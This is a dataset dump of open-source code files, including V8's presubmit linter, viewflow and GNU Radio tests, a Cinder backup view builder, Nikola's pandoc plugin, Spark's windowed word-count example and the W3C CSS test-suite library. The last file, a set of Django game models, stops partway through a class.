repo_name
stringlengths
6
100
path
stringlengths
4
294
copies
stringlengths
1
5
size
stringlengths
4
6
content
stringlengths
606
896k
license
stringclasses
15 values
greyhwndz/rethinkdb
external/v8_3.30.33.16/tools/presubmit.py
35
14090
#!/usr/bin/env python # # Copyright 2012 the V8 project authors. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. try: import hashlib md5er = hashlib.md5 except ImportError, e: import md5 md5er = md5.new import optparse import os from os.path import abspath, join, dirname, basename, exists import pickle import re import sys import subprocess import multiprocessing from subprocess import PIPE # Disabled LINT rules and reason. 
# build/include_what_you_use: Started giving false positives for variables # named "string" and "map" assuming that you needed to include STL headers. ENABLED_LINT_RULES = """ build/class build/deprecated build/endif_comment build/forward_decl build/include_alpha build/include_order build/printf_format build/storage_class legal/copyright readability/boost readability/braces readability/casting readability/constructors readability/fn_size readability/function readability/multiline_comment readability/multiline_string readability/streams readability/todo readability/utf8 runtime/arrays runtime/casting runtime/deprecated_fn runtime/explicit runtime/int runtime/memset runtime/mutex runtime/nonconf runtime/printf runtime/printf_format runtime/rtti runtime/sizeof runtime/string runtime/virtual runtime/vlog whitespace/blank_line whitespace/braces whitespace/comma whitespace/comments whitespace/ending_newline whitespace/indent whitespace/labels whitespace/line_length whitespace/newline whitespace/operators whitespace/parens whitespace/tab whitespace/todo """.split() # TODO(bmeurer): Fix and re-enable readability/check LINT_OUTPUT_PATTERN = re.compile(r'^.+[:(]\d+[:)]|^Done processing') def CppLintWorker(command): try: process = subprocess.Popen(command, stderr=subprocess.PIPE) process.wait() out_lines = "" error_count = -1 while True: out_line = process.stderr.readline() if out_line == '' and process.poll() != None: if error_count == -1: print "Failed to process %s" % command.pop() return 1 break m = LINT_OUTPUT_PATTERN.match(out_line) if m: out_lines += out_line error_count += 1 sys.stdout.write(out_lines) return error_count except KeyboardInterrupt: process.kill() except: print('Error running cpplint.py. Please make sure you have depot_tools' + ' in your $PATH. 
Lint check skipped.') process.kill() class FileContentsCache(object): def __init__(self, sums_file_name): self.sums = {} self.sums_file_name = sums_file_name def Load(self): try: sums_file = None try: sums_file = open(self.sums_file_name, 'r') self.sums = pickle.load(sums_file) except: # Cannot parse pickle for any reason. Not much we can do about it. pass finally: if sums_file: sums_file.close() def Save(self): try: sums_file = open(self.sums_file_name, 'w') pickle.dump(self.sums, sums_file) except: # Failed to write pickle. Try to clean-up behind us. if sums_file: sums_file.close() try: os.unlink(self.sums_file_name) except: pass finally: sums_file.close() def FilterUnchangedFiles(self, files): changed_or_new = [] for file in files: try: handle = open(file, "r") file_sum = md5er(handle.read()).digest() if not file in self.sums or self.sums[file] != file_sum: changed_or_new.append(file) self.sums[file] = file_sum finally: handle.close() return changed_or_new def RemoveFile(self, file): if file in self.sums: self.sums.pop(file) class SourceFileProcessor(object): """ Utility class that can run through a directory structure, find all relevant files and invoke a custom check on the files. """ def Run(self, path): all_files = [] for file in self.GetPathsToSearch(): all_files += self.FindFilesIn(join(path, file)) if not self.ProcessFiles(all_files, path): return False return True def IgnoreDir(self, name): return (name.startswith('.') or name in ('buildtools', 'data', 'gmock', 'gtest', 'kraken', 'octane', 'sunspider')) def IgnoreFile(self, name): return name.startswith('.') def FindFilesIn(self, path): result = [] for (root, dirs, files) in os.walk(path): for ignored in [x for x in dirs if self.IgnoreDir(x)]: dirs.remove(ignored) for file in files: if not self.IgnoreFile(file) and self.IsRelevant(file): result.append(join(root, file)) return result class CppLintProcessor(SourceFileProcessor): """ Lint files to check that they follow the google code style. 
""" def IsRelevant(self, name): return name.endswith('.cc') or name.endswith('.h') def IgnoreDir(self, name): return (super(CppLintProcessor, self).IgnoreDir(name) or (name == 'third_party')) IGNORE_LINT = ['flag-definitions.h'] def IgnoreFile(self, name): return (super(CppLintProcessor, self).IgnoreFile(name) or (name in CppLintProcessor.IGNORE_LINT)) def GetPathsToSearch(self): return ['src', 'include', 'samples', join('test', 'cctest'), join('test', 'unittests')] def GetCpplintScript(self, prio_path): for path in [prio_path] + os.environ["PATH"].split(os.pathsep): path = path.strip('"') cpplint = os.path.join(path, "cpplint.py") if os.path.isfile(cpplint): return cpplint return None def ProcessFiles(self, files, path): good_files_cache = FileContentsCache('.cpplint-cache') good_files_cache.Load() files = good_files_cache.FilterUnchangedFiles(files) if len(files) == 0: print 'No changes in files detected. Skipping cpplint check.' return True filt = '-,' + ",".join(['+' + n for n in ENABLED_LINT_RULES]) command = [sys.executable, 'cpplint.py', '--filter', filt] cpplint = self.GetCpplintScript(join(path, "tools")) if cpplint is None: print('Could not find cpplint.py. Make sure ' 'depot_tools is installed and in the path.') sys.exit(1) command = [sys.executable, cpplint, '--filter', filt] commands = join([command + [file] for file in files]) count = multiprocessing.cpu_count() pool = multiprocessing.Pool(count) try: results = pool.map_async(CppLintWorker, commands).get(999999) except KeyboardInterrupt: print "\nCaught KeyboardInterrupt, terminating workers." sys.exit(1) for i in range(len(files)): if results[i] > 0: good_files_cache.RemoveFile(files[i]) total_errors = sum(results) print "Total errors found: %d" % total_errors good_files_cache.Save() return total_errors == 0 COPYRIGHT_HEADER_PATTERN = re.compile( r'Copyright [\d-]*20[0-1][0-9] the V8 project authors. 
All rights reserved.') class SourceProcessor(SourceFileProcessor): """ Check that all files include a copyright notice and no trailing whitespaces. """ RELEVANT_EXTENSIONS = ['.js', '.cc', '.h', '.py', '.c', '.status', '.gyp', '.gypi'] # Overwriting the one in the parent class. def FindFilesIn(self, path): if os.path.exists(path+'/.git'): output = subprocess.Popen('git ls-files --full-name', stdout=PIPE, cwd=path, shell=True) result = [] for file in output.stdout.read().split(): for dir_part in os.path.dirname(file).replace(os.sep, '/').split('/'): if self.IgnoreDir(dir_part): break else: if (self.IsRelevant(file) and os.path.exists(file) and not self.IgnoreFile(file)): result.append(join(path, file)) if output.wait() == 0: return result return super(SourceProcessor, self).FindFilesIn(path) def IsRelevant(self, name): for ext in SourceProcessor.RELEVANT_EXTENSIONS: if name.endswith(ext): return True return False def GetPathsToSearch(self): return ['.'] def IgnoreDir(self, name): return (super(SourceProcessor, self).IgnoreDir(name) or name in ('third_party', 'gyp', 'out', 'obj', 'DerivedSources')) IGNORE_COPYRIGHTS = ['cpplint.py', 'daemon.py', 'earley-boyer.js', 'raytrace.js', 'crypto.js', 'libraries.cc', 'libraries-empty.cc', 'jsmin.py', 'regexp-pcre.js', 'gnuplot-4.6.3-emscripten.js'] IGNORE_TABS = IGNORE_COPYRIGHTS + ['unicode-test.js', 'html-comments.js'] def EndOfDeclaration(self, line): return line == "}" or line == "};" def StartOfDeclaration(self, line): return line.find("//") == 0 or \ line.find("/*") == 0 or \ line.find(") {") != -1 def ProcessContents(self, name, contents): result = True base = basename(name) if not base in SourceProcessor.IGNORE_TABS: if '\t' in contents: print "%s contains tabs" % name result = False if not base in SourceProcessor.IGNORE_COPYRIGHTS: if not COPYRIGHT_HEADER_PATTERN.search(contents): print "%s is missing a correct copyright header." 
% name result = False if ' \n' in contents or contents.endswith(' '): line = 0 lines = [] parts = contents.split(' \n') if not contents.endswith(' '): parts.pop() for part in parts: line += part.count('\n') + 1 lines.append(str(line)) linenumbers = ', '.join(lines) if len(lines) > 1: print "%s has trailing whitespaces in lines %s." % (name, linenumbers) else: print "%s has trailing whitespaces in line %s." % (name, linenumbers) result = False if not contents.endswith('\n') or contents.endswith('\n\n'): print "%s does not end with a single new line." % name result = False # Check two empty lines between declarations. if name.endswith(".cc"): line = 0 lines = [] parts = contents.split('\n') while line < len(parts) - 2: if self.EndOfDeclaration(parts[line]): if self.StartOfDeclaration(parts[line + 1]): lines.append(str(line + 1)) line += 1 elif parts[line + 1] == "" and \ self.StartOfDeclaration(parts[line + 2]): lines.append(str(line + 1)) line += 2 line += 1 if len(lines) >= 1: linenumbers = ', '.join(lines) if len(lines) > 1: print "%s does not have two empty lines between declarations " \ "in lines %s." % (name, linenumbers) else: print "%s does not have two empty lines between declarations " \ "in line %s." 
% (name, linenumbers) result = False return result def ProcessFiles(self, files, path): success = True violations = 0 for file in files: try: handle = open(file) contents = handle.read() if not self.ProcessContents(file, contents): success = False violations += 1 finally: handle.close() print "Total violating files: %s" % violations return success def CheckRuntimeVsNativesNameClashes(workspace): code = subprocess.call( [sys.executable, join(workspace, "tools", "check-name-clashes.py")]) return code == 0 def CheckExternalReferenceRegistration(workspace): code = subprocess.call( [sys.executable, join(workspace, "tools", "external-reference-check.py")]) return code == 0 def GetOptions(): result = optparse.OptionParser() result.add_option('--no-lint', help="Do not run cpplint", default=False, action="store_true") return result def Main(): workspace = abspath(join(dirname(sys.argv[0]), '..')) parser = GetOptions() (options, args) = parser.parse_args() success = True print "Running C++ lint check..." if not options.no_lint: success = CppLintProcessor().Run(workspace) and success print "Running copyright header, trailing whitespaces and " \ "two empty lines between declarations check..." success = SourceProcessor().Run(workspace) and success success = CheckRuntimeVsNativesNameClashes(workspace) and success success = CheckExternalReferenceRegistration(workspace) and success if success: return 0 else: return 1 if __name__ == '__main__': sys.exit(Main())
agpl-3.0
ribeiro-ucl/viewflow
tests/unit/tests/test_db_fields.py
2
2790
from django.test import TestCase

from viewflow.token import Token
from viewflow.fields import ClassValueWrapper

from ..models import FlowReferencedModel, TokenModel
from ..flows import SingleTaskFlow, AllTaskFlow


class TestReferenceFields(TestCase):
    """Tests for the custom db fields that store references to flow classes
    and flow tasks (round-trip through the database and lookups)."""

    def test_flowmodel_default_crud_succeed(self):
        """Saving a model with flow_cls set picks up the default task (flow start)."""
        instance = FlowReferencedModel()
        instance.flow_cls = SingleTaskFlow
        instance.save()
        # Re-fetch to force deserialization from the database row.
        instance = FlowReferencedModel.objects.get(pk=instance.pk)
        self.assertEqual(instance.flow_cls, SingleTaskFlow)
        self.assertEqual(instance.task, SingleTaskFlow.start)

    def test_flow_cls_crud_succeed(self):
        """An explicitly assigned task survives a save/load round trip."""
        instance = FlowReferencedModel.objects.create(
            flow_cls=SingleTaskFlow,
            task=SingleTaskFlow.end)
        instance = FlowReferencedModel.objects.get(pk=instance.pk)
        self.assertEqual(instance.flow_cls, SingleTaskFlow)
        self.assertEqual(instance.task, SingleTaskFlow.end)

    def test_get_by_cls_succeed(self):
        """Queryset lookup by flow class requires wrapping in ClassValueWrapper."""
        first = FlowReferencedModel.objects.create(
            flow_cls=SingleTaskFlow,
            task=SingleTaskFlow.end)
        second = FlowReferencedModel.objects.get(flow_cls=ClassValueWrapper(SingleTaskFlow))
        self.assertEqual(first.pk, second.pk)

    def test_get_by_flow_task_succeed(self):
        """Lookup by a task object matches only rows from the same flow."""
        FlowReferencedModel.objects.create(
            flow_cls=SingleTaskFlow,
            task=SingleTaskFlow.start)
        FlowReferencedModel.objects.create(
            flow_cls=AllTaskFlow,
            task=AllTaskFlow.start)
        instance = FlowReferencedModel.objects.get(task=SingleTaskFlow.start)
        self.assertEqual(instance.flow_cls, SingleTaskFlow)
        self.assertEqual(instance.task, SingleTaskFlow.start)

    def test_get_by_flow_task_ref_succeed(self):
        """Lookup also works with the string reference form 'module.Flow.task'."""
        FlowReferencedModel.objects.create(
            flow_cls=SingleTaskFlow,
            task=SingleTaskFlow.start)
        FlowReferencedModel.objects.create(
            flow_cls=AllTaskFlow,
            task=AllTaskFlow.start)
        instance = FlowReferencedModel.objects.get(task='unit/flows.SingleTaskFlow.start')
        self.assertEqual(instance.flow_cls, SingleTaskFlow)
        self.assertEqual(instance.task, SingleTaskFlow.start)


class TestTokenField(TestCase):
    """Tests for the Token db field (storage, default value, lookups)."""

    def test_crud_succeed(self):
        """A Token built from a string path can be stored."""
        instance = TokenModel()
        instance.token = Token('start/1_2')
        instance.save()

    def test_default_succeed(self):
        """A fresh model instance already carries a Token default."""
        instance = TokenModel()
        self.assertTrue(isinstance(instance.token, Token))
        instance.save()

    def test_startswith_lookup_succeed(self):
        """startswith lookups work against the serialized token text."""
        TokenModel.objects.create(token='start/1_2')
        instance = TokenModel.objects.get(token__startswith='start/1_')
        self.assertEqual('start/1_2', instance.token)
agpl-3.0
yanheven/cinder
cinder/api/views/backups.py
8
3833
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from oslo_log import log as logging

from cinder.api import common

# Module-level logger; currently unused in this module but kept for parity
# with the sibling view modules.
LOG = logging.getLogger(__name__)


class ViewBuilder(common.ViewBuilder):
    """Model backup API responses as a python dictionary."""

    # Collection name used by the base class to build links/paging keys.
    _collection_name = "backups"

    def __init__(self):
        """Initialize view builder."""
        super(ViewBuilder, self).__init__()

    def summary_list(self, request, backups, origin_backup_count):
        """Show a list of backups without many details.

        Delegates to _list_view with the per-item ``summary`` serializer.
        """
        return self._list_view(self.summary, request, backups,
                               origin_backup_count)

    def detail_list(self, request, backups, origin_backup_count):
        """Detailed view of a list of backups .

        Delegates to _list_view with the per-item ``detail`` serializer.
        """
        return self._list_view(self.detail, request, backups,
                               origin_backup_count)

    def summary(self, request, backup):
        """Generic, non-detailed view of a backup.

        Exposes only id, display name, and self/bookmark links.
        """
        return {
            'backup': {
                'id': backup['id'],
                'name': backup['display_name'],
                'links': self._get_links(request, backup['id']),
            },
        }

    def restore_summary(self, request, restore):
        """Generic, non-detailed view of a restore."""
        return {
            'restore': {
                'backup_id': restore['backup_id'],
                'volume_id': restore['volume_id'],
            },
        }

    def detail(self, request, backup):
        """Detailed view of a single backup.

        Uses .get() throughout so missing keys serialize as None rather
        than raising; 'links' still requires 'id' to be present.
        """
        return {
            'backup': {
                'id': backup.get('id'),
                'status': backup.get('status'),
                'size': backup.get('size'),
                'object_count': backup.get('object_count'),
                'availability_zone': backup.get('availability_zone'),
                'container': backup.get('container'),
                'created_at': backup.get('created_at'),
                'name': backup.get('display_name'),
                'description': backup.get('display_description'),
                'fail_reason': backup.get('fail_reason'),
                'volume_id': backup.get('volume_id'),
                'links': self._get_links(request, backup['id'])
            }
        }

    def _list_view(self, func, request, backups, origin_backup_count):
        """Provide a view for a list of backups.

        ``func`` is one of self.summary / self.detail; its 'backup' payload
        is unwrapped into the flat 'backups' list. Pagination links are
        appended only when the base class produces them.
        """
        backups_list = [func(request, backup)['backup'] for backup in backups]
        backups_links = self._get_collection_links(request,
                                                   backups,
                                                   self._collection_name,
                                                   origin_backup_count)
        backups_dict = dict(backups=backups_list)
        if backups_links:
            backups_dict['backups_links'] = backups_links
        return backups_dict

    def export_summary(self, request, export):
        """Generic view of an export."""
        return {
            'backup-record': {
                'backup_service': export['backup_service'],
                'backup_url': export['backup_url'],
            },
        }
apache-2.0
ffu/DSA-3.2.2
gnuradio-core/src/python/gnuradio/gr/qa_interleave.py
6
2818
#!/usr/bin/env python
#
# Copyright 2004,2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING.  If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#

from gnuradio import gr, gr_unittest
# NOTE(review): ``math`` is imported but never used in this file.
import math


class test_interleave (gr_unittest.TestCase):
    """QA tests for gr.interleave / gr.deinterleave blocks."""

    def setUp (self):
        # Fresh flowgraph for every test.
        self.tb = gr.top_block ()

    def tearDown (self):
        self.tb = None

    def test_int_001 (self):
        """Interleaving four strided sources reconstructs 0..lenx-1 in order."""
        lenx = 64
        # Each source emits every 4th value, offset by its port index.
        src0 = gr.vector_source_f (range (0, lenx, 4))
        src1 = gr.vector_source_f (range (1, lenx, 4))
        src2 = gr.vector_source_f (range (2, lenx, 4))
        src3 = gr.vector_source_f (range (3, lenx, 4))
        op = gr.interleave (gr.sizeof_float)
        dst = gr.vector_sink_f ()
        self.tb.connect (src0, (op, 0))
        self.tb.connect (src1, (op, 1))
        self.tb.connect (src2, (op, 2))
        self.tb.connect (src3, (op, 3))
        self.tb.connect (op, dst)
        self.tb.run ()
        expected_result = tuple (range (lenx))
        result_data = dst.data ()
        self.assertFloatTuplesAlmostEqual (expected_result, result_data)

    def test_deint_001 (self):
        """Deinterleaving 0..lenx-1 over four sinks yields the four stride-4 sequences."""
        lenx = 64
        src = gr.vector_source_f (range (lenx))
        op = gr.deinterleave (gr.sizeof_float)
        dst0 = gr.vector_sink_f ()
        dst1 = gr.vector_sink_f ()
        dst2 = gr.vector_sink_f ()
        dst3 = gr.vector_sink_f ()
        self.tb.connect (src, op)
        self.tb.connect ((op, 0), dst0)
        self.tb.connect ((op, 1), dst1)
        self.tb.connect ((op, 2), dst2)
        self.tb.connect ((op, 3), dst3)
        self.tb.run ()
        # Inverse of test_int_001: sink i receives values congruent to i mod 4.
        expected_result0 = tuple (range (0, lenx, 4))
        expected_result1 = tuple (range (1, lenx, 4))
        expected_result2 = tuple (range (2, lenx, 4))
        expected_result3 = tuple (range (3, lenx, 4))
        self.assertFloatTuplesAlmostEqual (expected_result0, dst0.data ())
        self.assertFloatTuplesAlmostEqual (expected_result1, dst1.data ())
        self.assertFloatTuplesAlmostEqual (expected_result2, dst2.data ())
        self.assertFloatTuplesAlmostEqual (expected_result3, dst3.data ())


if __name__ == '__main__':
    gr_unittest.main ()
gpl-3.0
perlygatekeeper/glowing-robot
google_test/free_the_bunny_prisoners/solution_5_fails.py
1
1090
import itertools


def solution(bunnies, keys_required):
    """Distribute numbered keys among ``bunnies`` holders so that any
    ``keys_required`` of them together hold every key.

    Returns a list with one (ascending) key list per bunny.
    """
    if keys_required == 0:
        # Nothing is ever required: a single dummy key stands in.
        return [[0]]

    distribution = [[] for _ in range(bunnies)]

    if keys_required == 1:
        # One bunny must suffice alone, so everyone shares key 0.
        for holder in distribution:
            holder.append(0)
    elif keys_required == bunnies:
        # All bunnies must be present: each gets its own unique key.
        for key, holder in enumerate(distribution):
            holder.append(key)
    else:
        # General case: mint one key per combination of keys_required
        # bunnies and hand it to every member of that combination.
        combos = itertools.combinations(range(bunnies), keys_required)
        for key, combo in enumerate(combos):
            for member in combo:
                distribution[member].append(key)

    return distribution


# Exercise the solver over a grid of inputs and pretty-print each answer,
# one bunny per line once the table grows past 25 entries.
for num_buns in range(1, 10):
    for num_required in range(10):
        key_dist = solution(num_buns, num_required)
        print("-" * 60)
        print("Answer for {0:d} bunnies, requiring {1:d}".format(num_buns, num_required))
        if (len(key_dist[0]) * len(key_dist)) < 25:
            print(key_dist)
        else:
            for bun in key_dist:
                print(bun)
artistic-2.0
techdragon/nikola
nikola/plugins/compile/pandoc.py
9
2903
# -*- coding: utf-8 -*- # Copyright © 2012-2015 Roberto Alsina and others. # Permission is hereby granted, free of charge, to any # person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the # Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the # Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice # shall be included in all copies or substantial portions of # the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR # PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS # OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """Implementation of compile_html based on pandoc. 
You will need, of course, to install pandoc """ from __future__ import unicode_literals import io import os import subprocess from nikola.plugin_categories import PageCompiler from nikola.utils import req_missing, makedirs, write_metadata class CompilePandoc(PageCompiler): """Compile markups into HTML using pandoc.""" name = "pandoc" friendly_name = "pandoc" def set_site(self, site): """Set Nikola site.""" self.config_dependencies = [str(site.config['PANDOC_OPTIONS'])] super(CompilePandoc, self).set_site(site) def compile_html(self, source, dest, is_two_file=True): """Compile source file into HTML and save as dest.""" makedirs(os.path.dirname(dest)) try: subprocess.check_call(['pandoc', '-o', dest, source] + self.site.config['PANDOC_OPTIONS']) except OSError as e: if e.strreror == 'No such file or directory': req_missing(['pandoc'], 'build this site (compile with pandoc)', python=False) def create_post(self, path, **kw): """Create a new post.""" content = kw.pop('content', None) onefile = kw.pop('onefile', False) # is_page is not used by create_post as of now. kw.pop('is_page', False) metadata = {} metadata.update(self.default_metadata) metadata.update(kw) makedirs(os.path.dirname(path)) if not content.endswith('\n'): content += '\n' with io.open(path, "w+", encoding="utf8") as fd: if onefile: fd.write('<!--\n') fd.write(write_metadata(metadata)) fd.write('-->\n\n') fd.write(content)
mit
mdespriee/spark
examples/src/main/python/sql/streaming/structured_network_wordcount_windowed.py
51
4086
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # r""" Counts words in UTF8 encoded, '\n' delimited text received from the network over a sliding window of configurable duration. Each line from the network is tagged with a timestamp that is used to determine the windows into which it falls. Usage: structured_network_wordcount_windowed.py <hostname> <port> <window duration> [<slide duration>] <hostname> and <port> describe the TCP server that Structured Streaming would connect to receive data. <window duration> gives the size of window, specified as integer number of seconds <slide duration> gives the amount of time successive windows are offset from one another, given in the same units as above. <slide duration> should be less than or equal to <window duration>. If the two are equal, successive windows have no overlap. If <slide duration> is not provided, it defaults to <window duration>. 
To run this on your local machine, you need to first run a Netcat server `$ nc -lk 9999` and then run the example `$ bin/spark-submit examples/src/main/python/sql/streaming/structured_network_wordcount_windowed.py localhost 9999 <window duration> [<slide duration>]` One recommended <window duration>, <slide duration> pair is 10, 5 """ from __future__ import print_function import sys from pyspark.sql import SparkSession from pyspark.sql.functions import explode from pyspark.sql.functions import split from pyspark.sql.functions import window if __name__ == "__main__": if len(sys.argv) != 5 and len(sys.argv) != 4: msg = ("Usage: structured_network_wordcount_windowed.py <hostname> <port> " "<window duration in seconds> [<slide duration in seconds>]") print(msg, file=sys.stderr) sys.exit(-1) host = sys.argv[1] port = int(sys.argv[2]) windowSize = int(sys.argv[3]) slideSize = int(sys.argv[4]) if (len(sys.argv) == 5) else windowSize if slideSize > windowSize: print("<slide duration> must be less than or equal to <window duration>", file=sys.stderr) windowDuration = '{} seconds'.format(windowSize) slideDuration = '{} seconds'.format(slideSize) spark = SparkSession\ .builder\ .appName("StructuredNetworkWordCountWindowed")\ .getOrCreate() # Create DataFrame representing the stream of input lines from connection to host:port lines = spark\ .readStream\ .format('socket')\ .option('host', host)\ .option('port', port)\ .option('includeTimestamp', 'true')\ .load() # Split the lines into words, retaining timestamps # split() splits each line into an array, and explode() turns the array into multiple rows words = lines.select( explode(split(lines.value, ' ')).alias('word'), lines.timestamp ) # Group the data by window and word and compute the count of each group windowedCounts = words.groupBy( window(words.timestamp, windowDuration, slideDuration), words.word ).count().orderBy('window') # Start running the query that prints the windowed word counts to the console query = 
windowedCounts\ .writeStream\ .outputMode('complete')\ .format('console')\ .option('truncate', 'false')\ .start() query.awaitTermination()
apache-2.0
adamncasey/servo
tests/wpt/web-platform-tests/css/tools/w3ctestlib/Suite.py
80
4441
#!/usr/bin/python # CSS Test Suite Manipulation Library # Initial code by fantasai, joint copyright 2010 W3C and Microsoft # Licensed under BSD 3-Clause: <http://www.w3.org/Consortium/Legal/2008/03-bsd-license> import OutputFormats import Utils from Groups import TestGroup, excludeDirs from Sources import SourceTree, SourceCache from shutil import copytree, rmtree from os.path import join import os from mercurial import ui as UserInterface, hg class TestSuite: """Representation of a standard CSS test suite.""" def __init__(self, name, title, specUri, draftUri, sourceCache = None, ui = None): self.name = name self.title = title self.specroot = specUri self.draftroot = draftUri self.ui = ui if ui else UserInterface.ui() self.defaultReftestRelpath='reftest.list' self.groups = {} self.sourcecache = sourceCache if sourceCache else SourceCache(SourceTree(hg.repository(self.ui, '.'))) self.formats = ('html4', 'xhtml1', 'xhtml1print') # XXX FIXME, hardcoded list is lame self.rawgroups = {} def addTestsByExt(self, dir, ext, groupName='', groupTitle=''): """Add tests from directory `dir` by file extension (via `ext`, e.g. ext='.xht'). """ group = TestGroup(self.sourcecache, dir, selfTestExt=ext, name=groupName, title=groupTitle, ui = self.ui) self.addGroup(group) def addTestsByList(self, dir, filenames, groupName='', groupTitle=''): """Add tests from directory `dir`, via file name list `filenames`. """ group = TestGroup(self.sourcecache, dir, selfTestList=filenames, name=groupName, title=groupTitle, ui = self.ui) self.addGroup(group) def addReftests(self, dir, manifestPath, groupName='', groupTitle=''): """Add tests by importing context of directory `dir` and importing all tests listed in the `reftestManifestName` manifest inside `dir`. 
""" group = TestGroup(self.sourcecache, dir, manifestPath=manifestPath, manifestDest=self.defaultReftestRelpath, name=groupName, title=groupTitle, ui = self.ui) self.addGroup(group) def addGroup(self, group): """ Add CSSTestGroup `group` to store. """ master = self.groups.get(group.name) if master: master.merge(group) else: self.groups[group.name] = group def addRaw(self, dir, relpath): """Add the contents of directory `dir` to the test suite by copying (not processing). Note this means such tests will not be indexed. `relpath` gives the directory's path within the build destination. """ self.rawgroups[dir] = relpath def setFormats(self, formats): self.formats = formats def buildInto(self, dest, indexer): """Builds test suite through all OutputFormats into directory at path `dest` or through OutputFormat destination `dest`, using Indexer `indexer`. """ if isinstance(dest, OutputFormats.BasicFormat): formats = (dest,) dest = dest.root else: formats = [] for format in self.formats: if (format == 'html4'): formats.append(OutputFormats.HTMLFormat(dest, self.sourcecache.sourceTree)) elif (format == 'html5'): formats.append(OutputFormats.HTML5Format(dest, self.sourcecache.sourceTree)) elif (format == 'xhtml1'): formats.append(OutputFormats.XHTMLFormat(dest, self.sourcecache.sourceTree)) elif (format == 'xhtml1print'): formats.append(OutputFormats.XHTMLPrintFormat(dest, self.sourcecache.sourceTree, self.title)) elif (format == 'svg'): formats.append(OutputFormats.SVGFormat(dest, self.sourcecache.sourceTree)) for format in formats: for group in self.groups.itervalues(): group.build(format) for group in self.groups.itervalues(): indexer.indexGroup(group) for format in formats: indexer.writeIndex(format) rawtests = [] for src, relpath in self.rawgroups.items(): copytree(src, join(dest,relpath)) for (root, dirs, files) in os.walk(join(dest,relpath)): for xdir in excludeDirs: if xdir in dirs: dirs.remove(xdir) rmtree(join(root,xdir)) rawtests.extend( 
[join(Utils.relpath(root,dest),file) for file in files] ) rawtests.sort() indexer.writeOverview(dest, addTests=rawtests)
mpl-2.0
mrjmad/nagademon_2014
nagademon2014/maingame/models/history_elements.py
1
6460
# -*- coding: utf-8 -*-
from __future__ import (print_function, division, absolute_import,
                        unicode_literals)

from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.db import models

# Swappable user-model reference, kept for ForeignKey targets elsewhere.
USER_MODEL = settings.AUTH_USER_MODEL


@python_2_unicode_compatible
class Character(models.Model):
    """Abstract base holding the fields shared by player and non-player characters."""
    short_name = models.CharField(_("NPC's short Name"), max_length=20, unique=True)
    first_name = models.CharField("Firstname of Character", max_length=50)
    last_name = models.CharField("Lastname of Character", max_length=50)
    gender = models.PositiveSmallIntegerField(u"Gender of Character")
    description = models.TextField("Description")

    def __str__(self):
        return u"%s %s" % (self.first_name, self.last_name)

    class Meta:
        abstract = True


@python_2_unicode_compatible
class PlayerCharacter(Character):
    """A character controlled by a player."""

    def __str__(self):
